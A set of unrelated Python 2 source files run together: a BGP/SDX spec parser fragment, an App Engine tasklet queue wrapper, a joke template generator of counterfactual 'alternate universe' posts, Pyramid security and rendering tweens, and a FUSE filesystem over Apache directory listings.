n = as2part(sas)
policy = self._get_policy(n)
tmp_policy = {}
# Assign Cookie ID
tmp_policy["cookie"] = self.cookie_id
self.cookie_id += 1
# Match
tmp_policy["match"] = {}
tmp_policy["match"]["tcp_dst"] = int(port)
# forward to participant number: convert name to assumed number (a=1)
tmp_policy["action"] = {"fwd": int(as2part(das))}
policy["outbound"].append(tmp_policy)
hostformer = []
def _do_host (self, args):
self.hostformer = []
if len(args) < 2:
raise Exception('usage: host sequence of chars, IP, ROUTER, NET, AS (will be concatenated)')
for i in range(1, len(args)):
self.hostformer.append(args[i])
# announce participant# name network name network ...
# if a network starts with a dash, it will be configured but not announced to BGP
def _do_announce (self, args):
if len(args) < 3:
raise Exception('usage: announce participant# network network ...')
announcements = []
networks = []
announce = True
part = args[1]
p = self.participants.get(part, {})
netnumb = 0
for i in range(2, len(args)):
net = args[i]
if net[0] == '-':
net = net[1:]
announce = False
ip_fix = net.split('/')
if len(ip_fix) != 2:
raise Exception('Invalid network announcement ' + net)
ip = ip_fix[0].split('.')
if len(ip) != 4:
raise Exception('Invalid ip address ' + ip_fix[0])
if announce:
announcements.append(net)
networks.append(net)
for r in p['Ports']: # routers
n = self.genname(netnumb, net, part2as(part), r['index'])
#print 'auto gen nodename = ' + n
# seed with the bind address in case will autogen nodes
# and empty ports for sanity
self.listeners[n] = {'bind': ip[0] + '.' + ip[1] + '.' + ip[2] + '.' + '1',
'ports': [] }
netnumb += 1
p['announcements'] = announcements
p['networks'] = networks
def _do_test (self, args, gather):
if len(args) != 3 or args[2] != "{":
raise Exception('usage: test testname {\n test commands\n }\n ')
testname = args[1]
testcmds = []
for line in gather:
line = line.partition('#')[0]
args = line.split()
if len(args) == 0:
continue
testcmds.append(line.strip())
self.tests[testname] = testcmds
# convert participant + index into a1, b1, c1, c2, etc., index starts at 0
def part_router2host(part, router):
return part2as(part) + str(router + 1)
# names run from a - z, then aa, ab, ac, ... az, ba
nameset = 'abcdefghijklmnopqrstuvwxyz'
routerset = '0123456789'
def as2part (name):
p = 0
for c in name:
p = p * len(nameset)
n = nameset.find(c)
if n < 0:
raise Exception('bad AS name: ' + name)
p += n + 1
if p < 1: ############# TODO or p > number_of_participants:
return None
return str(p)
def part2as (part):
part = int(part) # just in case
if part < 1: ############## TODO or part > number_of_participants:
raise Exception('Illegal participant number: ' + str(part))
base = len(nameset)
n = ''
while part != 0:
n += nameset[(part-1) % base]
part = (part - 1) / base
return n[::-1]
def host2as_router(name):
asys = ''
r = ''
lookforasys = True
foundasys = False
for c in name:
if c in nameset:
if not lookforasys:
return None, None
asys += c;
foundasys = True
elif c in routerset:
if not foundasys:
return None, None
lookforasys = False
r += c
if not foundasys or r == '':
return None, None
n = int(r)
if n <= 0:
return None, None
n -= 1 # routers run from 0 even though host is called a1, a2
################# TODO
# is this a valid AS and router?
#p = as2part(asys) # will raise exception if out of range
#if n >= len(self.participants[p]['Ports']): # number of edge-routers
#raise Exception('router does not exist for ' + name)
return asys, str(n)
if __name__ == "__main__":
p = parser('specs/test1-ms.spec')
print 'bgprouters'
print json.dumps(p.bgprouters, indent=4, sort_keys=True)
print 'peers'
print json.dumps(p.peers, indent=4, sort_keys=True)
print 'listeners'
print json.dumps(p.listeners, indent=4, sort_keys=True)
print 'tests'
print json.dumps(p.tests, indent=4, sort_keys=True)
print 'mode'
print json.dumps(p.mode, indent=4, sort_keys=True)
print 'policies'
print json.dumps(p.policies, indent=4, sort_keys=True)
print 'participants'
print json.dumps(p.participants, indent=4, sort_keys=True)
|
|
"""
Experimental trash, and jet set.
A ndb.tasklet-style interface to waterf.queue
::
from waterf import snake
def A(data):
rv = yield snake.task(other_func, data)
rv2 = yield (
snake.task(B, rv),
snake.task(C)
)
raise snake.Return(rv2)
snake.task(A, 'data').enqueue()
The implementation idea is to have the queue.tasks cache their results.
Note that in this pseudo-continuation-implementation any code which is not
a yield, gets executed multiple times.
"""
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.api import files
import pickle
import types
import logging
logger = logging.getLogger(__name__)
from . import queue
class Return(StopIteration):
def __init__(self, rv):
self.rv = rv
LARGE_PAYLOAD = 1000000
class _Result(ndb.Model):
status = ndb.StringProperty(default='pending', indexed=False)
large = ndb.BlobProperty(indexed=False)
huge = ndb.BlobKeyProperty(indexed=False)
@classmethod
def _get_kind(cls):
return '_Waterf_Result'
def is_ready(self):
return self.status == 'resolved'
@property
def result(self):
if self.large:
pickled = self.large
elif self.huge:
pickled = blobstore.BlobReader(self.huge).read()
return pickle.loads(pickled)
@result.setter
def result(self, value):
pickled = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
if len(pickled) < LARGE_PAYLOAD:
self.large = pickled
return
filename = files.blobstore.create(mime_type='application/octet-stream')
with files.open(filename, 'a') as f:
f.write(value)
files.finalize(filename)
self.huge = files.blobstore.get_blob_key(filename)
def delete(self):
if self.huge:
blobstore.BlobInfo(self.huge).delete()
self.key.delete()
@ndb.transactional
def resolve(self, result):
self.key.get()
self.status = 'resolved'
self.result = result
self.put()
class Result(queue.Lock):
model = _Result
def delete(self):
if self.exists():
self.get().delete()
def is_ready(self):
return self.exists() and self.get().is_ready()
def resolve(self, value):
if self.exists():
self.get().resolve(value)
def get_result(self):
if self.is_ready():
return self.get().result
else:
raise Pending
class Pending(Exception): pass
class Task(queue.Task):
_Lock = Result
def __init__(self, f, *a, **kw):
super(Task, self).__init__(f, *a, **kw)
self.id = self._generate_id()
self.root = None
def is_root(self):
return self.root is None
@property
def future(self):
return Result(self.id)
def resolve(self, result):
self.future.resolve(result)
super(Task, self).resolve(result)
def is_ready(self):
return self.future.is_ready()
def get_result(self):
return self.future.get_result()
def run(self):
# child tasks are enqueued using _name, so they're not
# mark'ed_as_enqueued yet
if not self.is_root():
self.mark_as_enqueued()
try:
rv = self.callable(*self.args, **self.kwargs)
except queue.AbortQueue, e:
rv = e
except queue.PermanentTaskFailure, e:
self.abort(e)
raise
except Return, e:
# as a convenience, otherwise if you commented out the last yield
# you would have to rewrite your function to use the standard 'return X'
rv = e.rv
if type(rv) is not types.GeneratorType:
if rv is queue.ABORT:
self.abort(rv)
elif isinstance(rv, queue.AbortQueue):
self.abort(rv)
elif isinstance(rv, queue.Deferred):
self.enqueue_subtask(rv)
else:
self.resolve(rv)
return rv
coroutine = rv
message = None
while 1:
try:
rv = coroutine.send(message)
except Return, e:
self.resolve(e.rv)
return
except StopIteration:
self.resolve(None)
return
if isinstance(rv, Task):
try:
message = rv.get_result()
except Pending:
self.enqueue_subtask(rv)
return
elif hasattr(rv, '__iter__'):
assert all(isinstance(thing, Task) for thing in rv)
parallel = Parallel(*rv)
try:
message = parallel.get_result()
except Pending:
self.enqueue_subtask(parallel)
return
def enqueue_subtask(self, task):
task.root = self.root if self.root else self
task.root.always(task._cleanup_handler())
super(Task, self).enqueue_subtask(task)
def _cleanup(self, _):
logger.debug("Cleanup %s" % self)
self._lock.delete()
def _subtask_completed(self, message):
self.run()
task = Task
class Parallel(queue.Parallel):
def __init__(self, *a, **kw):
super(Parallel, self).__init__(*a, **kw)
self.id = self._generate_id()
def is_ready(self):
return all(task.is_ready() for task in self.tasks)
@property
def result(self):
return [task.get_result() for task in self.tasks]
def get_result(self):
if self.is_ready():
return self.result
else:
raise Pending
def enqueue_subtask(self, task):
task.root = self.root if self.root else self
task.root.always(task._cleanup_handler())
super(Parallel, self).enqueue_subtask(task)
|
|
import re
import random
from jinja2 import Template
tmpls = [
"<WOWPHRASE><INFOSRC> {{subj_prop}} is {{real_prop_val}}<QP> <SWORNPHRASE>it was {{alt_prop_val}}<QP>",
"<PFFTORNOT>Don't <BUY> <ORG>'s <LIES>. {{ucfirst(subj_prop)}} is {{alt_prop_val}}, not {{real_prop_val}}<WOWPUNC><SHEEPLE>",
"<PFFTORNOT>Don't <BUY> <ORG>'s {{aster(\"<LIES>\")}}. {{ucfirst(subj_prop)}} is {{real_prop_val}}, not {{alt_prop_val}}<WOWPUNC><SHEEPLE>",
"{{ucfirst('<LIARS>')}} would have you <THINK><THATORNOT> {{subj_prop}} is {{real_prop_val}}. Don't be fooled. It's {{alt_prop_val}}.",
"My <NEW> <MEDIA> <ADVERBORNOT>argues that, <CONTRARY> <BELIEF>, {{subj_prop}} is {{alt_prop_val}}, not {{real_prop_val}}.",
"I must have ~phased into the alternate universe~ where {{subj_prop}} is {{real_prop_val}}. Shouldn't it be {{alt_prop_val}}?",
"<DISBELIEF>You expect me to believe<THATORNOT> {{subj_prop}} is {{real_prop_val}}? <EVERYONE> it's {{alt_prop_val}}. Just common sense.",
"I've discovered <EVIDENCE> that {{subj_prop}} is {{alt_prop_val}} and not<ASSUMEDORNOT> {{real_prop_val}}.",
"<BETPREF> <BETWITH> says that {{subj_prop}} is {{real_prop_val}}, but I think it's {{alt_prop_val}}. Which is it?",
"<WISTFULORNOT>Sometimes I <WONDER> what <LIFE> <WOULDBELIKE> if {{subj_prop}} had been {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}.",
"<QSTPHRASE><CRAZYORNOT>Does anyone else remember {{subj_prop}} as being {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}?<JUSTMEORNOT>",
"My <NEWORNOT>alternate <HISTORY> <NOVEL> begins with <THISSIMPLE> premise: what if {{subj_prop}} had been {{alt_prop_val}}, <INSTEADOF> {{real_prop_val}}?",
'<INITPHRASE>{{ucfirst(subj_prop)}} is "{{real_prop_val}}"? <MUSTBE> a typo. <SURELYTHEY> {{alt_prop_val}}.',
"<ACTUALLY>, and <PEOPLE> people <KNOW> this, {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}.<FYIORNOT>",
"<WOWPHRASE>All my life I thought {{alt_prop_val}} was {{subj_prop}}. But apparently it's {{real_prop_val}}. <MINDBLOWN><TILORNOT>",
"<UGH>. {{aster(ucfirst(alt_prop_val))}} is {{subj_prop}}, not {{real_prop_val}}. <CANT> <BELIEVE> <OUTLET> got this wrong.",
"<ALLIASK> consider the {{aster('possibility')}} that {{subj_prop}} is {{alt_prop_val}} and not {{real_prop_val}}.",
"<MANYBELIEVE><THATORNOT> {{real_prop_val}} is {{subj_prop}}. But you can't prove it's {{aster('NOT')}} {{alt_prop_val}}.",
u"Everyone knows<THATORNOT> {{subj_prop}} is {{real_prop_val}}. What this book {{aster('presupposes')}} is\u2026 maybe it's {{alt_prop_val}}?",
"{{aster('Why')}} would <YOUANYONE> <GOAROUNDTELLING><THATORNOT> {{real_prop_val}} is {{subj_prop}}, when it's so <CLEARLY> {{alt_prop_val}}?",
"I <STRONGLY> believe<THATORNOT> schools should teach <OURORNOT>kids the truth: {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}.",
"{{ucfirst(subj_prop)}} isn't {{real_prop_val}}. {{aster('Quite')}} the contrary<SEMIDASH>it's {{alt_prop_val}}.",
u"I <JUSTLAST>\u2014<DREAMANECORNOT>{{alt_prop_val}} was {{subj_prop}}, not {{real_prop_val}}.<SOWEIRDORNOT>",
"<PODCAST> just did an episode about how {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}. <PODCASTEVAL>"
]
grammar = {
'<WOWPHRASE>': ['{{ucfirst("<EXCL><WOWPUNC>")}}'],
'<EXCL>': ["oh wow", "wait", "wow", "huh"],
'<DISBELIEF>': ['Really. ', 'Really? ', '{{ucfirst("<EXCL>")}}. ', ''],
'<WOWPUNC>': ['! ', '. '],
'<QSTPHRASE>': ['{{ucfirst("<QST><QSTPUNC>")}}'],
'<QST>': ['huh', 'wait what', 'what'],
'<QSTPUNC>': ['? ', '?? ', '?! '],
'<INITPHRASE>': ['<WOWPHRASE>', '<QSTPHRASE>'],
'<INFOSRC>': ['I just read that',
'Someone just told me<THATORNOT>', 'It says here<THATORNOT>'],
'<SWORN>': ['I could have sworn', 'I was so convinced', 'I was sure',
'I thought {{aster("everyone")}} believed'],
'<SWORNPHRASE>': ['But <SWORN><THATORNOT> ', '<SWORN><THATORNOT> '],
'<THATORNOT>': [' that', ''],
'<QP>': ['?', '.'],
'<BUY>': ['believe', 'buy', 'listen to'],
'<ORG>': ['Big Brother', 'Big Pharma', "the government", "Big Oil",
"Halliburton", "the Illuminati"],
'<LIES>': ['lies', 'claims', 'propaganda'],
'<SHEEPLE>': ['Wake up, sheeple!',
'WAKE UP<CORNOT> SHEEPLE<WOWPUNC>'],
'<CORNOT>': [',', ''],
'<PFFTORNOT>': ['<PFFT>', ''],
'<PFFT>': ['P<F>t. '],
'<F>': ['{{rmult("f",1,6)}}'],
'<NEW>': ['new', 'upcoming', 'forthcoming'],
'<MEDIA>': ['book', 'film', 'documentary', 'essay', 'opera',
'folk song', 'musical', 'doctoral thesis'],
'<ADVERBORNOT>': ['', '{{aster("<ADVERB>")}} '],
'<ADVERB>': ['persuasively', 'definitively', 'stridently',
'incontrovertibly'],
'<BELIEF>': ['popular beliefs', 'common misconceptions',
'the received wisdom', 'what THEY say'],
'<CONTRARY>': ['contrary to', 'despite', 'regardless of'],
'<EVERYONE>': ['{{aster("Everyone")}} knows',
'We {{aster("all")}} know',
"It's obvious<THATORNOT>"],
'<EXPECT>': ['seriously <EXPECTWANT>', '<EXPECTWANT>'],
'<EXPECTWANT>': ['expect', 'want'],
'<EVIDENCE>': ['<EVIDADJ> evidence', 'evidence'],
'<EVIDADJ>': ['surprising', 'shocking', 'astounding', 'weird new',
'incontrovertible', 'conclusive'],
'<ASSUMEDPHRASE>': ['commonly assumed', 'previously believed'],
'<ASSUMEDORNOT>': [', as <ASSUMEDPHRASE>,', ''],
'<BETPREF>': ['{{ucfirst("<BETCOMBO>")}}:'],
'<BETCOMBO>': ['<OKAYSO>settle a bet', '<OKAYSO>help me out here'],
'<OKAYSO>': ['', 'Okay, so... ', 'So ', 'OK, '],
'<BETWITH>': ['My girlfriend', 'My boyfriend', 'My buddy',
'This guy at the bar', 'My brother', 'My sister'],
'<WISTFULORNOT>': ['<WISTFUL> ', ''],
'<WISTFUL>': ['Sigh.', '*sigh*', 'Hmm.'],
'<WONDER>': ['wonder', 'like to imagine', 'daydream about',
'contemplate', 'seriously contemplate'],
'<LIFE>': ['life', 'my life', 'this country', 'our world',
'the Internet'],
'<WOULDBELIKE>': ['would be like', 'would have been like',
'would look like', 'would have looked like'],
'<INSTEADOF>': ['instead of', 'and not', 'not'],
'<NEWORNOT>': ['<NEW> ', ''],
'<HISTORY>': ['history', 'universe', 'timeline'],
'<NOVEL>': ['novel', 'epic', 'saga', 'romance', 'novella', 'dystopia',
'trilogy', 'fanfic', 'slashfic', 'text adventure'],
'<THISSIMPLE>': ['the simple', 'a simple', 'this simple'],
'<MUSTBE>': ['Must be', "Pretty sure that's", "I think that's",
"Probably"],
'<SURELYTHEY>': ['Surely they meant', 'They probably meant',
'They {{aster("must")}} have meant', 'It should <REALLYORNOT>say'],
'<REALLYORNOT>': ['really ', 'actually ', 'probably ', ''],
'<AMICRAZY>': ['Am I going crazy?', 'Am I nuts?', 'Really?'],
'<CRAZYORNOT>': ['<AMICRAZY> ', ''],
'<JUSTMEORNOT>': [' Or is it just me?', ' So {{aster("weird.")}}', ''],
'<ACTUALLY>': ['Actually', 'A{{rmult("a",1,5)}}ctually', 'FYI', 'Just FYI',
'Just so you know'],
'<PEOPLE>': ['not many', 'very few', 'only a handful of'],
'<KNOW>': ['know', 'are aware of', 'really understand',
'have any idea about', 'truly grok'],
'<FYIORNOT>': [' Just FYI.', ' FYI.', '', ''],
'<ALLMYLIFE>': ['All my life I thought<THATORNOT>',
'In school we learned<THATORNOT>',
'<AUTHORITYFIGURE> always told me<THATORNOT>'],
'<AUTHORITYFIGURE>': ['My teacher', 'My mom', 'My dad', 'My grandpa',
'My grandmother', 'My friends'],
'<MINDBLOWN>': ["MIND BLOWN<WOWPUNC> ", 'Mind blown<WOWPUNC> ',
"You learn something new every day<WOWPUNC> ", ''],
'<TILORNOT>': ['#TIL', ''],
'<CANT>': ["I can't", "I cannot", "Can't", "I can NOT"],
'<BELIEVE>': ['{{aster("believe")}}<THATORNOT>', "understand how"],
'<OUTLET>': ["Wikipedia", "the NY Times", "my professor"],
'<UGHPHRASE>': ["<UGH>.", "<UGH>. No."],
'<UGH>': ["Ugh", "UGH", "Wow"],
'<LIARS>': ['"Scientists"', 'the "mainstream" media',
'those ivory tower pencil-necks', 'government shills'],
'<THINK>': ["think", "believe"],
'<ALLIASK>': ["All I ask is<THATORNOT> you", "I only ask<THATORNOT> you",
"I only want for you to", "The only think I ask is<THATORNOT> you"],
'<MANYBELIEVE>': ["Many believe", "Some believe", "You say"],
'<CLEARLY>': ["clearly", "obviously", "plainly"],
'<STRONGLY>': ["strongly", "fervently"],
'<OURORNOT>': ["our ", ""],
'<GOAROUNDTELLING>': ["go around telling people",
"{{aster('publicly')}} claim"],
'<YOUANYONE>': ["you", "anyone", "you (or anyone)"],
'<SEMIDASH>': ["; ", u"\u2014"],
'<JUSTLAST>': ["just had the {{aster(caps('<WEIRD>'))}} dream",
"had the {{aster(caps('<WEIRD>'))}} dream last night"],
'<WEIRD>': ["weirdest", "strangest", "most unusual"],
'<DREAMANEC>': ["I was naked", "I was late for class",
"A bear was chasing me", "I had a <PET>",
"I was getting married", "I got a new phone"],
'<PET>': ["cat", "dog", "puppy", "kitten", "pet frog"],
'<DREAMANECORNOT>': ["<DREAMANEC>, and ", ""],
'<SOWEIRD>': ["So weird.", "So. Weird.", "Bizarre.",
"What does it mean?"],
'<SOWEIRDORNOT>': ["", " {{caps('<SOWEIRD>')}}"],
'<PODCAST>': ["Radiolab", "This American Life", "99% Invisible",
"Savage Lovecast", "Slate's Political Gabfest"],
'<PODCASTEVAL>': ["{{caps('So good')}}.", "Amazing!",
"You should<TOTALLYORNOT> subscribe."],
'<TOTALLYORNOT>': [" totally", ""]
}
def ucfirst(s):
return s[0].upper() + s[1:]
def expand(grammar, axiom):
expansions = list()
replacethese = re.findall(r'<[^>]+>', axiom)
if len(replacethese) > 0:
for to_replace in replacethese:
possibles = grammar[to_replace]
if len(possibles) > 1:
at_least = 1
else:
at_least = 1
for replacement in random.sample(possibles, at_least):
replaced = re.sub(to_replace, replacement, axiom)
expanded = expand(grammar, replaced)
if len(expanded) > 1:
expansions.extend(random.sample(expanded, 1))
else:
expansions.extend(random.sample(expanded, 1))
else:
expansions.append(axiom)
return expansions
def rmult(item, rstart, rend):
return item * random.randrange(rstart, rend)
def aster(item):
if random.randrange(2) == 0:
return "*" + item + "*"
else:
return item
def caps(item):
if random.randrange(2) == 0:
return item.upper()
else:
return item
def alternate_universe(subject, prop, real_prop_val, alt_prop_val):
if prop.isupper(): prop = prop.lower()
if re.search(r"^[a-zA-Z ]+[^s]$", subject):
subj_prop = subject + "'s " + prop
else:
subj_prop = "the " + prop + " of " + subject
possibles = list()
for tmpl_str in tmpls:
possibles_this = list()
expansions = expand(grammar, tmpl_str)
for expansion in expansions:
tmpl = Template(expansion)
res = tmpl.render(subj_prop=subj_prop, real_prop_val=real_prop_val,
alt_prop_val=alt_prop_val, ucfirst=ucfirst, rmult=rmult,
aster=aster, caps=caps)
possibles_this.append(res)
possibles.append(random.choice(possibles_this))
#print "\n".join(possibles)
return ucfirst(random.choice(possibles))
if __name__ == '__main__':
# Everyone knows Halle Berry's birth year is 1966. What this book
# presupposes is... maybe it's 2039? http://en.wikipedia.org/wiki/Halle_Berry
while True:
print alternate_universe("Halle Berry", "birth year", "1966", "2039")
|
|
from pkg_resources import resource_filename
from pyramid.events import (
BeforeRender,
subscriber,
)
from pyramid.httpexceptions import (
HTTPMovedPermanently,
HTTPPreconditionFailed,
HTTPUnauthorized,
HTTPUnsupportedMediaType,
)
from pyramid.security import forget
from pyramid.settings import asbool
from pyramid.threadlocal import (
manager,
)
from pyramid.traversal import (
split_path_info,
_join_path_tuple,
)
from contentbase.validation import CSRFTokenError
from subprocess_middleware.tween import SubprocessTween
import logging
import os
import psutil
import time
log = logging.getLogger(__name__)
def includeme(config):
config.add_tween(
'.renderers.fix_request_method_tween_factory',
under='contentbase.stats.stats_tween_factory')
config.add_tween(
'.renderers.normalize_cookie_tween_factory',
under='.renderers.fix_request_method_tween_factory')
config.add_tween('.renderers.page_or_json', under='.renderers.normalize_cookie_tween_factory')
config.add_tween('.renderers.security_tween_factory', under='pyramid_tm.tm_tween_factory')
config.scan(__name__)
def fix_request_method_tween_factory(handler, registry):
""" Fix Request method changed by mod_wsgi.
See: https://github.com/GrahamDumpleton/mod_wsgi/issues/2
Apache config:
SetEnvIf Request_Method HEAD X_REQUEST_METHOD=HEAD
"""
def fix_request_method_tween(request):
environ = request.environ
if 'X_REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = environ['X_REQUEST_METHOD']
return handler(request)
return fix_request_method_tween
def security_tween_factory(handler, registry):
def security_tween(request):
login = None
expected_user = request.headers.get('X-If-Match-User')
if expected_user is not None:
login = request.authenticated_userid
if login != 'mailto.' + expected_user:
detail = 'X-If-Match-User does not match'
raise HTTPPreconditionFailed(detail)
# wget may only send credentials following a challenge response.
auth_challenge = asbool(request.headers.get('X-Auth-Challenge', False))
if auth_challenge or request.authorization is not None:
login = request.authenticated_userid
if login is None:
raise HTTPUnauthorized(headerlist=forget(request))
if request.method in ('GET', 'HEAD'):
return handler(request)
if request.content_type != 'application/json':
detail = "%s is not 'application/json'" % request.content_type
raise HTTPUnsupportedMediaType(detail)
token = request.headers.get('X-CSRF-Token')
if token is not None:
# Avoid dirtying the session and adding a Set-Cookie header
# XXX Should consider if this is a good idea or not and timeouts
if token == dict.get(request.session, '_csrft_', None):
return handler(request)
raise CSRFTokenError('Incorrect CSRF token')
if login is None:
login = request.authenticated_userid
if login is not None:
namespace, userid = login.split('.', 1)
if namespace not in ('mailto', 'persona'):
return handler(request)
raise CSRFTokenError('Missing CSRF token')
return security_tween
def normalize_cookie_tween_factory(handler, registry):
from webob.cookies import Cookie
ignore = {
'/favicon.ico',
}
def normalize_cookie_tween(request):
if request.path in ignore or request.path.startswith('/static/'):
return handler(request)
session = request.session
if session or session._cookie_name not in request.cookies:
return handler(request)
response = handler(request)
existing = response.headers.getall('Set-Cookie')
if existing:
cookies = Cookie()
for header in existing:
cookies.load(header)
if session._cookie_name in cookies:
return response
response.delete_cookie(
session._cookie_name,
path=session._cookie_path,
domain=session._cookie_domain,
)
return response
return normalize_cookie_tween
@subscriber(BeforeRender)
def set_x_request_url(event):
# Used by fetch polyfill and server rendering
request = event['request']
request.response.headers['X-Request-URL'] = request.url
@subscriber(BeforeRender)
def canonical_redirect(event):
request = event['request']
# Ignore subrequests
if len(manager.stack) > 1:
return
if request.method not in ('GET', 'HEAD'):
return
if request.response.status_int != 200:
return
if not request.environ.get('encoded.canonical_redirect', True):
return
if request.path_info == '/':
return
canonical_path = event.rendering_val.get('@id', None)
if canonical_path is None:
return
canonical_path = canonical_path.split('?', 1)[0]
request_path = _join_path_tuple(('',) + split_path_info(request.path_info))
if (request_path == canonical_path.rstrip('/') and
request.path_info.endswith('/') == canonical_path.endswith('/')):
return
if '/@@' in request.path_info:
return
qs = request.query_string
location = canonical_path + ('?' if qs else '') + qs
raise HTTPMovedPermanently(location=location)
def should_transform(request, response):
if request.method not in ('GET', 'HEAD'):
return False
if response.content_type != 'application/json':
return False
format = request.params.get('format')
if format is None:
original_vary = response.vary or ()
response.vary = original_vary + ('Accept', 'Authorization')
if request.authorization is not None:
format = 'json'
else:
mime_type = request.accept.best_match(
[
'text/html',
'application/ld+json',
'application/json',
],
'text/html')
format = mime_type.split('/', 1)[1]
if format == 'ld+json':
format = 'json'
else:
format = format.lower()
if format not in ('html', 'json'):
format = 'html'
if format == 'json':
return False
request._transform_start = time.time()
return True
def after_transform(request, response):
end = time.time()
duration = int((end - request._transform_start) * 1e6)
stats = request._stats
stats['render_count'] = stats.get('render_count', 0) + 1
stats['render_time'] = stats.get('render_time', 0) + duration
request._stats_html_attribute = True
# Rendering huge pages can make the node process memory usage explode.
# Ideally we would let the OS handle this with `ulimit` or by calling
# `resource.setrlimit()` from a `subprocess.Popen(preexec_fn=...)`.
# Unfortunately Linux does not enforce RLIMIT_RSS.
# An alternative would be to use cgroups, but that makes per-process limits
# tricky to enforce (we would need to create one cgroup per process.)
# So we just manually check the resource usage after each transform.
rss_limit = 256 * (1024 ** 2) # MB
def reload_process(process):
return psutil.Process(process.pid).memory_info().rss > rss_limit
node_env = os.environ.copy()
node_env['NODE_PATH'] = ''
page_or_json = SubprocessTween(
should_transform=should_transform,
after_transform=after_transform,
reload_process=reload_process,
args=['node', resource_filename(__name__, 'static/build/renderer.js')],
env=node_env,
)
|
|
#!/usr/bin/env python
__author__ = "Gawen Arab"
__copyright__ = "Copyright 2012, Gawen Arab"
__credits__ = ["Gawen Arab"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Gawen Arab"
__email__ = "gawen@forgetbox.com"
__status__ = "Beta"
import BeautifulSoup
import datetime
import email.utils
import errno
import functools
import fuse
import httplib
import logging
import optparse
import os
import sys
import socket
import stat
import threading
import time
import urllib
import urlparse
class TimeoutDictionary(object):
def __init__(self, timeout):
super(TimeoutDictionary, self).__init__()
self.timeout = timeout
self.d = {}
def __getitem__(self, k):
v = self.d[k]
if time.time() - v[0] > self.timeout:
raise KeyError(k)
return v[1]
def __setitem__(self, k, v):
self.d[k] = [time.time(), v]
def __delitem__(self, k):
del self.d[k]
def get(self, k, default = None):
try:
return self[k]
except KeyError:
return None
def iterkeys(self):
for k, v in self.d.iteritems():
if time.time() - v[0] > self.timeout:
continue
yield k
__iter__ = iterkeys
def iteritems(self):
for k in self.iterkeys():
yield (k, self[k])
def itervalues(self):
for k in self.iterkeys():
yield self[k]
def __len__(self):
return len(list(self))
def __contains__(self, k):
return k in list(self)
def func_cache(f):
@functools.wraps(f)
def wrapper(self, path, *kargs, **kwargs):
if not hasattr(f, "_cache"):
f._cache = TimeoutDictionary(self.timeout)
with self.lock:
r = f._cache.get(path, None)
if r is not None:
if isinstance(r, Exception):
raise r
return r
try:
r = f(self, path, *kargs, **kwargs)
except OSError, e:
with self.lock:
f._cache[path] = e
raise e
else:
with self.lock:
f._cache[path] = r
return r
return wrapper
class ApacheFuse(fuse.LoggingMixIn, fuse.Operations):
def __init__(self, base_url, timeout = None):
timeout = timeout if timeout is not None else 60
self.timeout = timeout
if not base_url.endswith("/"):
base_url += "/"
self.base_url_str = base_url
self.base_url = urlparse.urlparse(base_url)
self.lock = threading.Lock()
assert self.base_url.scheme in ("http", "https", )
self.local = threading.local()
def create_connection(self):
http_connection_cls = {
"http": httplib.HTTPConnection,
"https": httplib.HTTPSConnection,
}[self.base_url.scheme]
http_connection = http_connection_cls(
self.base_url.hostname,
port = self.base_url.port,
)
return http_connection
@property
def connection(self):
if not hasattr(self.local, "connection"):
self.local.connection = self.create_connection()
return self.local.connection
def request(self, method, path, headers = None):
headers = headers if headers is not None else {}
base_path = self.base_url.path
if base_path.endswith("/"):
base_path = base_path[:-1]
path = base_path + path
try:
self.connection.request(method, path, headers = headers)
response = self.connection.getresponse()
except socket.gaierror:
raise OSError(errno.ECONNREFUSED, os.strerror(errno.ECONNREFUSED))
if response.status == 404:
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
if response.status in (301, 302, ):
# Flush
response.read()
location = response.getheader("Location")
if not location.startswith(self.base_url_str):
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
location = location[len(self.base_url_str):]
return self.request(method, "/" + location, headers)
return path, response
@func_cache
def readdir(self, path, fh = None):
path, response = self.request("GET", urllib.quote(path))
response = response.read()
response = BeautifulSoup.BeautifulSoup(response)
if response.pre:
response = response.pre
listdir = []
for a in response.findAll("a", recursive = False):
if a["href"] != a.text:
continue
path = a.text
if path.endswith("/"):
path = path[:-1]
listdir.append(path)
return listdir
elif response.table:
response = response.table
# Get meta
def get_meta_list():
r = {}
for i, meta in enumerate(response.tr.findAll("th")):
meta = meta.a
if meta:
meta = str(meta.text).lower()
r[i] = meta
return r
meta_list = get_meta_list()
def get_meta(file_dom, meta_list):
r = {}
for i, m in enumerate(file_dom):
meta_title = meta_list[i]
if meta_title is None:
continue
r[meta_title] = m
return r
listdir = []
for file_dom in response.findAll("tr", recursive = False):
file_dom = file_dom.findAll("td", recursive = False)
if len(file_dom) != len(meta_list):
continue
file_meta = get_meta(file_dom, meta_list)
file_path = file_meta["name"].a["href"]
file_name = file_meta["name"].text
if file_name == "Parent Directory":
continue
file_path = path + file_path
if file_name.endswith("/"):
file_name = file_name[:-1]
listdir.append(file_name)
return listdir
@func_cache
def getattr(self, path, fh = None):
path, response = self.request("HEAD", urllib.quote(path))
st = {}
st["st_mode"] = 0
if path.endswith("/"):
st["st_mode"] |= stat.S_IFDIR
st["st_mode"] |= stat.S_IXUSR
st["st_mode"] |= stat.S_IXGRP
else:
st["st_mode"] |= stat.S_IFREG
st["st_mode"] |= stat.S_IRUSR
st["st_mode"] |= stat.S_IRGRP
# Parse data
date = response.getheader("Date")
if date is not None:
amc_time = email.utils.parsedate(date)
amc_time = time.mktime(amc_time)
amc_time = int(amc_time)
st["st_atime"] = st["st_mtime"] = st["st_ctime"] = amc_time
content_length = response.getheader("Content-Length")
if content_length is not None:
content_length = int(content_length)
st["st_size"] = content_length
st["st_gid"] = 1000
st["st_uid"] = 1000
st["st_nlink"] = 1
return st
def read(self, path, size, offset, fh = None):
start = offset
end = offset + size - 1
headers = {
"Range": "bytes=%d-%d" % (start, end, )
}
path, response = self.request("GET", urllib.quote(path), headers = headers)
if path.endswith("/"):
raise OSError(errno.EISDIR, os.strerror(errno.EISDIR))
buf = response.read()
return buf
def main():
parser = optparse.OptionParser()
parser.add_option("-v", "--verbose", action = "store_true", default = False)
